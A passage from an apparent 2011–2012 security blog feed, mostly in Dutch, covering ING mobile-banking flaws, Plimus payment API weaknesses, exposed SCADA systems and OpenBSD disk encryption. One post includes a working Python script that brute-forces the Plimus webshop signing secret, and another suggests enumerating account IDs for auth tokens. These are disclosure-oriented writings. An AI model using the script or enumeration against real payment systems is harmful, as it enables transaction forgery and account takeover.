is nog meer veranderd: smartphones. Bijna iedereen heeft tegenwoordig wel een iPhone, 
Android-telefoon, tablet of een ander mobiel&amp;nbsp;apparaat. De meeste mensen willen hier ook op 
kunnen bankieren en ik maak me daar zorgen over.&lt;br /&gt;
&lt;br /&gt;
Veel mensen hebben veel meer vertrouwen in hun telefoon dan in hun Windows PC. Op je Windows PC 
kan je harde schijf crashen, je hebt last van virussen, rare foutmeldingen die niemand begrijpt 
en bovendien verschuilen zich allerlei hackers op het internet die niets dan nare bedoelingen 
hebben. Telefoons zijn anders. Die draag je altijd bij je, ze werken bijna altijd en bijna al je 
persoonlijke communicatie verloopt via je telefoon in de vorm van Twitter, Facebook, WhatsApp of 
gewoon ouderwetse telefoongesprekken. Telefoons zijn persoonlijk en vertrouwd.&lt;br /&gt;
&lt;br /&gt;
Ook de ING lijkt telefoons als vertrouwde&amp;nbsp;apparaten&amp;nbsp;te behandelen zoals ik in een 
vorige &lt;a 
href=&#34;http://floorter.blogspot.com/2012/01/verantwoordelijkheid-voor-beveiliging.html&#34;&gt;blogpost&lt;/a&gt; 
uitgelegd heb. Na die blogpost ben ik gebeld door iemand van de ING met de uitnodiging om zo snel 
mogelijk langs te komen om te praten over wat ik gevonden had. Naar mijn mening is de ING zelf 
twee punten van de &#34;drie keer kloppen&#34;-campagne vergeten.&lt;br /&gt;
&lt;br /&gt;
Als eerste de beveiliging van mobiele telefoons. De meeste telefoons krijgen al lange tijd geen 
beveiligingsupdates meer. Dat betekent dat er veel mensen rondlopen met smartphones die vatbaar 
zijn voor allerlei aanvallen zonder dat de eindgebruiker hier iets aan kan doen behalve met enige 
regelmaat een nieuwe telefoon kopen die wel redelijk recente software heeft. En mobiele antivirus 
kan je in de praktijk al helemaal niet op vertrouwen. Toch hebben veel banken besloten om actief 
mobiel bankieren te promoten.&lt;br /&gt;
&lt;br /&gt;
Het tweede punt is misschien nog wel ernstiger. Klanten werden bedolven onder campagnes om &#34;het 
slotje&#34; te controleren. Als je dat slotje in je browser ziet weet je dat een bedrijf (zoals 
Diginotar) een digitale handtekening heeft gezet onder een certificaat van de website die je 
bezoek. Als ik bijvoorbeeld het slotje zie op de site https://mijn.ing.nl/ dan weet ik twee 
dingen:&lt;br /&gt;
&lt;ol style=&#34;position: static; z-index: auto;&#34;&gt;
&lt;li&gt;Een bedrijf (Verisign in dit geval) beweert dat het echt de ING is waarmee ik praat.&lt;/li&gt;
&lt;li&gt;Zolang beide bedrijven zelf hun beveiliging goed op orde hebben kan niemand afluisteren wat 
ik op die website doe en kan niemand stiekem tussen mij en de ING gaan zitten om data ongemerkt 
aan te passen (een mitm-aanval)&lt;/li&gt;
&lt;/ol&gt;
&lt;div&gt;
In mijn onderzoek naar de ING-applicatie voor Android heb ik ontdekt dat het niet alleen mogelijk 
is, maar zelfs makkelijk om toch een mitm-aanval te doen. Dat komt omdat de applicatie zelf niet 
goed de controle&amp;nbsp;uitvoert&amp;nbsp;die de klanten wel zouden moeten doen. Nadat ik de ING dit 
verteld heb hebben ze een nieuwe versie van de applicatie uitgebracht die hier wel tegen bestand 
is. Bovendien heeft de ING nu oude versies van de applicatie geblokkeerd zodat die ook niet meer 
misbruikt kunnen worden.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Wat ik ook kwalijk vind is dat de ING hier niet eerlijk over is naar haar klanten. Ik vind dat 
klanten het recht hebben om te weten wat voor risico ze lopen, maar in de release notes vermeldt 
de ING niet dat er beveiligingslekken zijn gevonden in oudere versies. Ook krijg ik geen credits 
voor het vinden en verantwoordelijk melden van de lekken. Ondanks dat de gesprekken met de ING 
vriendelijk zijn verlopen heb ik toch het idee dat ik de volgende keer meer terughoudend moet 
zijn met het delen van informatie. Dat vind ik jammer, want volgens mij is het in het voordeel 
van de ING om te bevorderen dat mensen dit soort informatie makkelijk met ze delen.&lt;br /&gt;
&lt;br /&gt;
Het actualiteitenprogramma EenVandaag heeft over mijn onderzoek een uitzending gemaakt. 
&lt;!-- &lt;object 
data=&#34;http://www.eenvandaag.nl/v/99990&#34; height=&#34;281&#34; type=&#34;application/x-shockwave-flash&#34; 
width=&#34;500&#34;&gt;&lt;param name=&#34;movie&#34; value=&#34;http://www.eenvandaag.nl/v/99990&#34; &gt;
&lt;/param&gt;
&lt;param name=&#34;allowfullscreen&#34; value=&#34;true&#34; &gt;
&lt;/param&gt;
&lt;param name=&#34;allowscriptaccess&#34; value=&#34;always&#34; /&gt;
&lt;/object&gt;&lt;img alt=&#34;sitestat&#34; height=&#34;1&#34; 
src=&#34;http://nl.sitestat.com/klo/po/s?eenvandaag.player.embed.video_id.99990&amp;amp;category=eenvandaag&amp;amp;ns_webdir=eenvandaag&amp;amp;ns_channel=nieuws_informatie&amp;amp;po_source=video&amp;amp;ns_context=partnersites&amp;amp;ns_auto=&amp;amp;po_sitetype=plus&#34; 
width=&#34;1&#34; /&gt; --&gt;
&lt;br /&gt;
&lt;video src=&#34;/video/eenvandaag-21-03-12-ing.m4v&#34; poster=&#34;/video/eenvandaag-21-03-12-ing.jpg&#34; controls&gt;
    Your browser doesn&#39;t support HTML5 video.
&lt;/video&gt;
P.S.&lt;br /&gt;
Bij mijn onderzoek hoort ook een paper in het Engels die niet meer helemaal up-to-date is en 
vooral nog veel taalfouten bevat. Ik zal deze ook zo spoedig mogelijk
online zetten.&lt;br /&gt;&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>Authentication tokens gone wrong</title>
    <link href="http://floort.net/blog/authentication-tokens-gone-wrong.html"></link>
    <id>http://floort.net/blog/authentication-tokens-gone-wrong.html</id>
    <updated>2012-03-09T00:00:00Z</updated>
    <summary>Here is another blog about Plimus. It seems like they don&#39;t want to communicate or fix security 
issues instead they continue building new features. It&#39;s a shame that a company that handles 
money as a primary buisiness doesn&#39;t have security as a top priority. This blogpost is about a 
feature that I have warned Plimus about, but haven&#39;t been able to test because a Plimus employee 
actively refused to give me access to this feature, even after the engineer in charge for 
security asked me explicitly to test and report more security problems. So keep this in 
mind when you read this blog: I have not tried to exploit this.&lt;br /&gt;
The feature I want to talk about is a feature that webshops can use to 
streamline the payment experience for customers. When a user uses Plimus to pay in a webshop, the 
user is redirected to Plimus and has to login and fill in some payment information. To make it 
easier for customers the webshop can now offer an authentication token when the customer is 
redirected. The user is now logged in automatically.&lt;br /&gt;
&lt;div&gt;This process works as following[1]:&lt;/div&gt;
&lt;div&gt;
    &lt;ol&gt;
        &lt;li&gt;A webshop has the Plimus accountid for customers it has seen
        before because a payment IPN contains the accountid. This
        accountid is an integer that&#39;s probably sequential.&lt;/li&gt;
        &lt;li&gt;The webshop takes the accountid and requests an
        authentication token with Plimus that&#39;s valid for a given amount
        of time. This request is done by a HTTP GET request to the
        following url &lt;code&gt;https://ws.plimus.com/services/2/tools/auth-token?shopperId=[accountId]&amp;amp;expirationInMinutes=[desired time]&lt;/code&gt;
        &lt;/li&gt;
&lt;li&gt;The webshop receives an authentication token as a result of the above request.&lt;/li&gt;
&lt;li&gt;When the webshop redirects the user, the webshop uses the authentication token in the 
redirect url like this: 
&lt;code&gt;http://www.plimus.com/jsp/entrance.jsp?contractId=[contractId]&amp;amp;target=[desired process 
step]&amp;amp;token=[authentication token]&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The user is now logged in to Plimus and can finish the payment process without logging into 
Plimus&lt;/li&gt;
&lt;/ol&gt;
&lt;div&gt;
Why is this dangerous?&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;The webshop is given full access to the Plimus account of all paying customers.&lt;/li&gt;
&lt;li&gt;The user is not notified of this fact.&lt;/li&gt;
&lt;li&gt;Because an accountId is a sequential integer I strongly suspect that it&#39;s possible to 
enumerate them all and get authentication tokens for all Plimus users.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
Just fix your stuff Plimus. And don&#39;t invent your own cryptographic protocols. You don&#39;t even 
know what &#34;hexadecimal&#34; means.&lt;/div&gt;
&lt;div&gt;
[1]&lt;a 
href=&#34;http://home.plimus.com/ecommerce/developers/featured-solution&#34;&gt;http://home.plimus.com/ecommerce/developers/featured-solution&lt;/a&gt;&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>Howto crack Plimus &#34;MD5hex encryption&#34;</title>
    <link href="http://floort.net/blog/howto-crack-plimus-md5hex-encryption.html"></link>
    <id>http://floort.net/blog/howto-crack-plimus-md5hex-encryption.html</id>
    <updated>2012-02-24T15:28:00Z</updated>
    <summary>It&#39;s been a while since I have reported a few security bugs to Plimus. It took a few blogposts 
explaining the issues publicly before I got in contact with an engineer. I understand that making 
backwards incompatible changes to your customer facing API&#39;s is not a trivial task, however the 
way Plimus handles these issues is just terrible.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;&lt;br /&gt;
One engineer asks me for more feedback while in the same mail thread another Plimus employee 
demands proof I&#39;m PCI certified and wants to know what applications I&#39;m going to build before I 
get access to the test API of Plimus. If you don&#39;t even let me test security bugs before I report 
them you won&#39;t get the bugreport at all. Maybe I can test them after you have gone live and 
customers already depend on the API.&lt;br /&gt;
&lt;br /&gt;
The first actual promised date for a simple fix passed five days ago. Since then I have gotten no 
response. They even refused to acknowledge in advance what exactly they where going to fix.&lt;br /&gt;
&lt;br /&gt;
For your enjoyment I have written proof of concept code that you can use to crack the shared 
secret between Plimus and a webshop. This secret is the only security with which transactions 
between a webshop and Plimus are signed and authenticated. Have fun!&lt;br /&gt;
&lt;br /&gt;
Once you have the reply a webshop gives to a Plimus IPN (in this example 
&#34;8c083afc16dfe31e5d92a6358f33297d&#34;), you can recover the key like this:&lt;br /&gt;
&lt;code&gt;
$ python crack_plimus_hmac.py 8c083afc16dfe31e5d92a6358f33297d&lt;br /&gt;
Trying length 1&lt;br /&gt;
Trying length 2&lt;br /&gt;
Trying length 3&lt;br /&gt;
Trying length 4&lt;br /&gt;
Data Protection Key: SCRT&lt;br /&gt;
&lt;/code&gt;
&lt;br /&gt;
And the sourcecode:&lt;br /&gt;
&lt;pre&gt;#!/usr/bin/env python

CHARSET = &#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ&#34;
MAXLENGTH = 4

import sys
from md5 import md5
from itertools import product

target = sys.argv[1]

for length in range(1, MAXLENGTH+1):
    print &#34;Trying length&#34;, length
    for password in product(CHARSET, repeat=length):
        if target == md5(&#34;OK&#34;+&#34;&#34;.join(password)).hexdigest():
            print &#34;Data Protection Key:&#34;, &#34;&#34;.join(password)
            sys.exit()
&lt;/pre&gt;
</summary>
  </entry>
  <entry>
    <title>SCADA</title>
    <link href="http://floort.net/blog/scada.html"></link>
    <id>http://floort.net/blog/scada.html</id>
    <updated>2012-01-31T20:03:00Z</updated>
    <summary>&lt;div class=&#34;tr_bq&#34;&gt;
Iedereen die een beetje handig is met computers en al wat jaartjes meeloopt op het internet kent 
ze wel: default wachtwoorden op routers. Als je op een netwerk zit en je met je webbrowser naar 
het IP-adres van de router surft (meestal http://192.168.1.1/ ) kom je op de beheerpagina van je 
router. Soms hoef je niet in te loggen; meestal volstaat een standaard login (username=admin 
password=admin). Dat is natuurlijk erg grappig; je kan ongevraagd met de instellingen rommelen 
van de mensen waar je op bezoek bent. De iets slimmere nerds hadden in de gaten dat veel routers 
ook te bereiken waren via het internet, ook vaak met standaard wachtwoorden beveiligd. Dat maakt 
het al leuker: je kan opeens vanuit je luie stoel met heel veel internetverbindingen spelen. Dat 
is nog eens kattekwaad! Maar waarom doet niemand hier wat aan? De meeste mensen zetten een router 
neer, pluggen met veel moeite de stekkers erin. Als alles werkt zijn ze al lang blij. Ze beseffen 
zich niet dat er nog allemaal ingewikkelde instellingen veranderd kunnen worden en dat die 
beveiligd moeten worden met een wachtwoord.&lt;/div&gt;
&lt;!--more--&gt;De afgelopen jaren is de industrie ook steeds meer gedigitaliseerd. Waar je vroeger 
nog aan zware hendels moest draaien kan je nu met een paar klikken op een computer je machines 
bedienen. Je sluit een kastje aan op de machines in je fabriek en de computer vertelt je hoe hoog 
de oliedruk is, of hoe heet de oven is. Met een paar muisklikken kan je ook kleppen dichtzetten, 
de temperatuur opschroeven, etcetera. Zo&#39;n kastje heet een SCADA-systeem. SCADA staat voor 
Supervisory Control And Data Aquisition. Fabrieken zijn ingewikkeld, dus als alle machines zijn 
aangesloten op het SCADA-systeem ga je niet meer de instellingen veranderen. Net als je router 
thuis eigenlijk. Nu hebben veel SCADA-systemen nog meer overeenkomsten met routers: ze hangen aan 
het internet. Dat is makkelijk als een technicus op afstand wil controleren of alles in orde is 
met de fabriek. Wat blijkt nu? Om de vergelijking met routers helemaal af te maken - veel 
SCADA-systemen zijn ook slechts beveiligd met standaard wachtwoorden zoals de bekende 
admin/admin-combinatie.&lt;br /&gt;
&lt;br /&gt;
Dat betekent dat er controlesystemen van kritieke infrastructuur en fabrieken potentieel door 
iedereen met een computer te bedienen zijn. Alsof iedere 15-jarige de fabriek in kan lopen en 
alle knopjes kan indrukken en alle hendels kan overhalen.&lt;br /&gt;
&lt;br /&gt;
Hacker &lt;a href=&#34;https://twitter.com/#%21/ntisec&#34;&gt;@ntisec&lt;/a&gt; vond het genoeg en heeft besloten om 
een overzicht te maken van lekke SCADA-systemen om aandacht voor het probleem te vragen. Dit 
heeft Joost Schellevis van de website tweakers.net opgepikt in zijn &lt;a 
href=&#34;http://tweakers.net/reviews/2465/all/scada-beveiliging-een-structureel-probleem.html&#34;&gt;artikel&lt;/a&gt;. 
Daarnaast heeft Wassila&amp;nbsp;Hachchi van D66 vandaag schriftelijke kamervragen gesteld over dit 
onderwerp. Ik hoop dat hier de vergelijking met routers ophoudt; hiervan zijn er na al die jaren 
nog een hoop onbeveiligd te vinden op het internet.&lt;br /&gt;
&lt;br /&gt;
Hier zijn de kamervragen:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;
&lt;br /&gt;
Schriftelijke vragen van de leden Hachchi en Schouw (beiden D66) aan de minister van Binnenlandse 
Zaken en de minister van Veiligheid en Justitie over de risico&#39;s van software voor het op afstand 
besturen van industriële processen. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1.  Hebt u kennisgenomen van het artikel, Scada-beveiliging een structureel probleem, van 30 
januari 2012, door Joost Schellevis op &lt;a href=&#34;http://www.tweakers.net/&#34;&gt;www.tweakers.net&lt;/a&gt;?  
(&lt;a 
href=&#34;http://tweakers.net/reviews/2465/all/scada-beveiliging-een-structureel-probleem.html&#34;&gt;http://tweakers.net/reviews/2465/all/scada-beveiliging-een-structureel-probleem.html&lt;/a&gt;) 
&lt;br /&gt;
&lt;br /&gt;
2.  Onderschrijft u de stelling van de schrijver dat, anders dan in het Cybersecuritybeeld 
Nederland 2011 wordt gesuggereerd, het niet nodig is om over uitzonderlijk geavanceerde software 
te beschikken om een aanval op een beheerssysteem van bijvoorbeeld een riolering te laten slagen? 
&lt;br /&gt;
&lt;br /&gt;
3.  Welke veiligheidseisen worden er gesteld aan Scada-systemen, zowel bij de overheid als in de 
commerciële sector? Hoe wordt hier toezicht op gehouden? Indien er toezicht gehouden wordt, wat 
is dan het beeld dat toezichthouders hebben van de veiligheid van de systemen? &lt;br /&gt;
&lt;br /&gt;
4.  Onderschrijft u de waarschuwing voor het gevaar van USB-sticks? Kunnen in cruciale 
industriële infrastructuren, zoals de kerncentrale van Borssele, datadragers van buitenaf, zoals 
usb sticks, vrij ingevoerd worden? Of bestaan hier beveiligingsprotocollen voor? &lt;br /&gt;
&lt;br /&gt;
5.  Hoe beoordeelt u de veiligheidsrisico&#39;s van Scada-systemen die rechtstreeks op het internet 
zijn aangesloten? &lt;/blockquote&gt;
&lt;blockquote&gt;
6.  Is er op Europees niveau aandacht voor de veiligheidsrisico&#39;s van Scada-systemen? Zo ja, 
welke activiteiten worden er op dit gebied ontplooid? Zo nee, bent u bereid hier aandacht voor te 
vragen?&lt;/blockquote&gt;
&lt;br /&gt;
Update:&lt;br /&gt;
De officiële plek voor de kamervragen is hier: 
https://zoek.officielebekendmakingen.nl/kv-151345.html&amp;nbsp; &lt;br /&gt;
Er zijn ook een hoop taalfouten verbeterd (dank aan &lt;a 
href=&#34;https://twitter.com/#%21/neetje&#34;&gt;@neetje&lt;/a&gt;)
</summary>
  </entry>
  <entry>
    <title>Verantwoordelijkheid voor beveiliging</title>
    <link href="http://floort.net/blog/verantwoordelijkheid-voor-beveiliging.html"></link>
    <id>http://floort.net/blog/verantwoordelijkheid-voor-beveiliging.html</id>
    <updated>2012-01-15T15:13:00Z</updated>
    <summary>Een tijdje geleden is mij de mobiele applicatie voor internetbankieren van de ING opgevallen. 
Door de combinatie van de gevoeligheid van mobiele platforms (In dit geval Android, maar het 
issue is niet Android specifiek.) en het ontbreken van TAN-codes als tweede factor voor de 
authenticatie zag ik een aanvalsvector waarvoor ik niet zag hoe daar tegen verdedigd zou worden. 
De lek zou ernstig zijn omdat er zonder je medeweten saldo van je rekening afgeschreven zou 
kunnen worden en dat op grote schaal bij gebruikers van deze mobiele app. In mijn onderzoek heb 
ik delen van de app reverse engineered en veel geleerd over de communicatie van de applicatie met 
de ING servers. Op een gegeven moment ben ik me gaan realiseren dat als ik daadwerkelijk de 
zwakte overtuigend wilde demonstreren ik de wet zou moeten overtreden. Dat gaat mij een stap te 
ver. Door mijn onderzoek heb ik ook wat geleerd over de afwegingen die de ING heeft gemaakt en 
wat ik van de ING wil is dat ze duidelijk communiceren wie verantwoordelijk is als er iets 
misgaat.&lt;br /&gt;
&lt;div&gt;
&lt;!--more--&gt;Het technische verhaal kan ik zonder moeilijke details te gebruiken uitleggen. Het 
ouderwetse internetbankieren bij de ING werkt via de browser. Als je een virus op je computer zou 
hebben, zou dat virus betalingen kunnen aanpassen, wachtwoorden afluisteren, etc. Om dat te 
voorkomen zijn TAN-codes bedacht. Op het moment dat je een betaling uitvoert krijg je een smsje 
met details over de betaling die je op dat moment wilt doen met een eenmalig te gebruiken 
TAN-code. Die code moet je vervolgens invoeren om de betaling af te ronden. Daarmee bewijs je dat 
je niet alleen kan inloggen onder de account van de bezitter van de rekening, maar dat je ook 
controle hebt over zijn of haar telefoon. Omdat telefoons meestal onafhankelijk zijn van de 
desktop computers van een persoon maak je de drempel om in te breken in de bankrekening dusdanig 
veel hoger dat deze vorm van beveiliging erg effectief is. Tot zover lijkt alles in orde.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
De komst van moderne smartphones verandert echter een hoop. Mensen willen alles kunnen met hun 
smartphone en banken zijn bijna gedwongen om ook mobiele betalingen mogelijk te maken. Logisch, 
want het is erg handig om overal toegang te hebben tot je bankrekening. Het probleem komt echter 
als je het oude security model gaat vertalen naar mobiele telefoons. Stel dat ik wil 
internetbankieren op mijn mobiele telefoon krijg ik opeens de TAN codes binnen op hetzelfde 
apparaat als waarmee ik de transacties afhandel. Het voordeel van TAN-codes is daarmee volledig 
verdwenen. De ING heeft dit beseft en heeft dan ook het gebruik van TAN-codes afgeschaft voor de 
&amp;nbsp;mobiele variant van het internetbankieren. Om misbruik bij diefstal en verlies van de 
telefoon te voorkomen is er een pincode nodig om de applicatie te ontgrendelen. Dat is gezien het 
scenario een redelijke beveiliging. Maar wat als je een virus zou hebben op je telefoon? Het 
virus zou dan de applicatie aan kunnen passen om alle betalingen aan te passen zodat bijvoorbeeld 
het geld naar de rekening van de schrijver van het virus gaat. Of het virus kan zorgen dat er op 
de achtergrond kleine betalingen gedaan worden die niet opgemerkt worden door de rekeninghouder. 
Het grootste obstakel is het virus op de telefoons krijgen. In deze blogpost zal ik volstaan met 
de melding dat bijna geen enkele Android telefoon langdurig &lt;a 
href=&#34;http://theunderstatement.com/post/11982112928/android-orphans-visualizing-a-sad-history-of-support&#34;&gt;beveiligingsupdates&lt;/a&gt; 
krijgt, er &lt;a 
href=&#34;http://lifehacker.com/5861757/do-android-antivirus-apps-actually-do-anything&#34;&gt;geen 
effectieve antivirus&lt;/a&gt; is en mensen zich vaak niet beseffen dat er iets fout kan gaan aan de 
beveiliging van mobiele telefoons.&lt;br /&gt;
&lt;br /&gt;
Toen ik deze vermoedens bij de ING heb gemeld heeft een medewerker van de ING telefonisch contact 
met mij opgenomen om mij gerust te stellen. Op de vraag of deze lek te misbruiken is kreeg ik als 
antwoord dat niets 100% veilig is, maar dat ze enkele maatregels hebben getroffen om misbruik te 
voorkomen en dat ze heel goed opletten of er toch misbruik voorkomt. En als het dan toch misgaat 
zouden klanten hun geld terugkrijgen.&lt;br /&gt;
&lt;br /&gt;
Dat de ING weet dat hun applicatie dit beveiligingsprobleem heeft verbaast me niets. Dat ze er 
toch niets aan lijken te doen kan ik me ook voorstellen. Als ze de applicatie namelijk echt goed 
willen beveiligen moeten ze het waarschijnlijk zo aanpassen dat het gebruikersgemak dusdanig 
slechter word dat niemand er meer gebruik van zal maken. Ik heb echter wel een probleem met hoe 
de ING omgaat met de vraag wie verantwoordelijk is voor de beveiliging. De ING kan namelijk niet 
verantwoordelijk zijn voor de beveiliging van mijn telefoon omdat ze buiten hun eigen applicatie 
niets kunnen beveiligen (en dat is niet genoeg). Daarom zou ik zeggen dat ik zelf 
verantwoordelijk ben voor de beveiliging van mijn eigen telefoon. Maar als ik zelf 
verantwoordelijk ben wil ik weten welke risico&#39;s ik loop zodat ik minimaal een afweging kan maken 
van de risico&#39;s en mogenlijk zelfs stappen kan nemen om mijn telefoon beter te beveiligen. Maar 
de ING wil mij niet vertellen welke risico&#39;s ik loop, zelfs niet als ik specifiek naar bepaalde 
lekken vraag. De gebruikersvoorwaarden zeggen ook niets over de wie er verantwoordelijk is.&lt;br /&gt;
&lt;br /&gt;
Aan de ING heb ik dan ook een paar concrete vragen:&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;Wie is er verantwoordelijk als door beveiligingslekken in hun internetbankieren app geld 
gestolen word?&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Mag ik concreet aantonen&amp;nbsp;dat&amp;nbsp;de applicatie slecht beveiligd is om mijn stelling te 
onderbouwen? (zonder daarvoor geld te stelen van iemand &amp;nbsp;die daar niet vantevoren 
ondubbelzinnig toestemming heeft gegeven en een proces van responsible disclosure in acht nemende 
voor de publicatie)&lt;/li&gt;
&lt;li&gt;Wat doen jullie concreet om misbruik te voorkomen? (Zaken als obfuscated code en custom 
keyboards zijn niet effectief.)&lt;/li&gt;
&lt;li&gt;Kunnen jullie transparant zijn over de beveiligingsrisico&#39;s van mobiel internetbankieren of 
heel duidelijk aangeven dat jullie volledig de verantwoordelijkheid nemen voor 
beveiligingsproblemen en altijd alle geleden&amp;nbsp;schade vergoeden?&lt;/li&gt;
&lt;/ol&gt;
&lt;div&gt;
Wees je bewust van het risico en bedenk je dat dit probleem niet specifiek is voor de ING.&lt;/div&gt;
&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>OpenBSD disk encryption</title>
    <link href="http://floort.net/blog/openbsd-disk-encryption.html"></link>
    <id>http://floort.net/blog/openbsd-disk-encryption.html</id>
    <updated>2011-12-05T13:55:00Z</updated>
    <summary>laptops are easy to lose or steal and you don&#39;t want any potentially sensitive data to be stolen 
too. For that purpose many companies now require disk encryption. The OpenBSD softraid 
CRYPTO&amp;nbsp;discipline has grown to be a mature piece of software and since I was long due for a 
fresh OpenBSD installation anyway I decided to give it a try.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;Let&#39;s start with the goals:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;No user files should be recoverable when the laptop gets lost or stolen without knowledge of 
my passphrase.&lt;/li&gt;
&lt;li&gt;The boot and upgrade process should be as simple as possible.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
What I&#39;m not trying to do:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;Provide plausible deniability: The largest disk slice is a softraid CRYPTO volume and the 
system asks for a passphrase on bootup. The use of encryption is obvious.&lt;/li&gt;
&lt;li&gt;Provide a secure system after other people have had physical access: The disk contains a 
small unencrypted part used for booting. With physical access you can easily modify the boot 
process to record the passphrase for example.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
My primary source for this procedure was this blogpost: 
http://geekyschmidt.com/2011/01/19/configuring-openbsd-softraid-fo-encryption&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Start by booting into bsd.rd and open a shell. Like in the blogpost, create a disk layout like 
this:&lt;/div&gt;
&lt;code&gt;
$ sudo disklabel -h wd0&lt;br /&gt;
# /dev/rwd0c:&lt;br /&gt;
type: ESDI&lt;br /&gt;
disk: ESDI/IDE disk&lt;br /&gt;
label: ST980811AS&lt;br /&gt;      
duid: 1898f5c8938a0ebf&lt;br /&gt;
flags:&lt;br /&gt;
bytes/sector: 512&lt;br /&gt;
sectors/track: 63&lt;br /&gt;
tracks/cylinder: 255&lt;br /&gt;
sectors/cylinder: 16065&lt;br /&gt;
cylinders: 9729&lt;br /&gt;
total sectors: 156301488 # total bytes: 74.5G&lt;br /&gt;
boundstart: 64&lt;br /&gt;
boundend: 156296385&lt;br /&gt;
drivedata: 0 &lt;br /&gt;
&lt;br /&gt;
16 partitions:&lt;br /&gt;
#                size           offset  fstype [fsize bsize  cpg]&lt;br /&gt;
  a:             1.0G               64  4.2BSD   2048 16384    1 # /&lt;br /&gt;
  b:             2.2G          2104512    swap                   # none&lt;br /&gt;
  c:            74.5G                0  unused                   &lt;br /&gt;
  d:            71.3G          6715170    RAID&amp;nbsp;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;
The RAID partition will hold all the encrypted data.
&lt;br /&gt;
Now you have to tell the system to use the RAID partition:&lt;br /&gt;
&lt;code&gt;bioctl -c C -r 8192 -l /dev/wd0d softraid0&lt;/code&gt;&lt;br /&gt;
&lt;div&gt;
This will prompt for a passphrase. Choose wisely: too long and you might forget it, too short and 
it might be guessed by an attacker. Now start the install and continue normally until you need to 
setup the disks.&lt;br /&gt;
The first disk you need is the disk you boot from. Use the whole disk and layout you created 
earlier. Next continue with your newly attached softraid volume. My softraid disk looks like 
this:&lt;br /&gt;
&lt;code&gt;
$ sudo disklabel -h sd2  &lt;br /&gt;
# /dev/rsd2c:&lt;br /&gt;
type: SCSI&lt;br /&gt;
disk: SCSI disk&lt;br /&gt;
label: SR CRYPTO&lt;br /&gt;
duid: 96ce005d1a254d38&lt;br /&gt;
flags:&lt;br /&gt;
bytes/sector: 512&lt;br /&gt;
sectors/track: 63&lt;br /&gt;
tracks/cylinder: 255&lt;br /&gt;
sectors/cylinder: 16065&lt;br /&gt;
cylinders: 9310&lt;br /&gt;
total sectors: 149580687 # total bytes: 73037.4M&lt;br /&gt;
boundstart: 64&lt;br /&gt;
boundend: 149565150&lt;br /&gt;
drivedata: 0 &lt;br /&gt;
&lt;br /&gt;
16 partitions:&lt;br /&gt;
#                size           offset  fstype [fsize bsize  cpg]&lt;br /&gt;
  a:          4102.5M               64  4.2BSD   2048 16384    1 # /tmp&lt;br /&gt;
  b:          2047.3M          8401984  4.2BSD   2048 16384    1 # /usr&lt;br /&gt;
  c:         73037.4M                0  unused                   &lt;br /&gt;
  d:          1019.8M         12594944  4.2BSD   2048 16384    1 # /usr/X11R6&lt;br /&gt;
  e:         10236.7M         14683392  4.2BSD   2048 16384    1 # /usr/local&lt;br /&gt;
  f:          2047.3M         35648224  4.2BSD   2048 16384    1 # /usr/obj&lt;br /&gt;
  g:          2047.3M         39841184  4.2BSD   2048 16384    1 # /usr/src&lt;br /&gt;
  h:         45386.8M         56613056  4.2BSD   2048 16384    1 # /home&lt;br /&gt;
  i:          6142.0M         44034144  4.2BSD   2048 16384    1 # /var&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;
Finish your installation as you&#39;d normally would and reboot.&lt;br /&gt;
Upon rebooting you will be greeted by messages urging you to run fsck, don&#39;t do this and just 
press enter for a shell. Now you have to bring your softraid partition online: &lt;code&gt;bioctl -c C 
-l /dev/wd0d softraid0 &amp;amp;&amp;amp; exit&lt;/code&gt;. Enter your passphrase and the system will boot 
normally.&lt;br /&gt;
&lt;br /&gt;
Doing this on every boot is annoying. So after you booted open &lt;code&gt;/etc/rc&lt;/code&gt; and put the 
line &lt;code&gt;bioctl -c C -l /dev/wd0d softraid0&lt;/code&gt; just before the part where it checks the 
disks (line 278 in my version). When you reboot it should ask you for a passphrase 
automatically.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>Digitale veiligheid: bewustwording en naleving</title>
    <link href="http://floort.net/blog/digitale-veiligheid-bewustwording-en-naleving.html"></link>
    <id>http://floort.net/blog/digitale-veiligheid-bewustwording-en-naleving.html</id>
    <updated>2011-11-09T02:50:00Z</updated>
    <summary>Veiligheid in de digitale wereld krijgt de laatste tijd veel aandacht. Door het&amp;nbsp;hacken van 
Diginotar zijn mensenlevens in gevaar gekomen en vanaf dat moment&amp;nbsp;lijken veel mensen zich te 
beseffen dat de veiligheid van onze digitale&amp;nbsp;infrastructuur toch eigenlijk best wel 
belangrijk is. Om het punt duidelijk te&amp;nbsp;maken dat veiligheidslekken eerder regel dan 
uitzondering zijn is Brenno de&amp;nbsp;Winter met Lektober gekomen: elke dag van de maand oktober 
publiceerde hij een&amp;nbsp;lek in een website van een bedrijf of een overheidsinstelling. De 
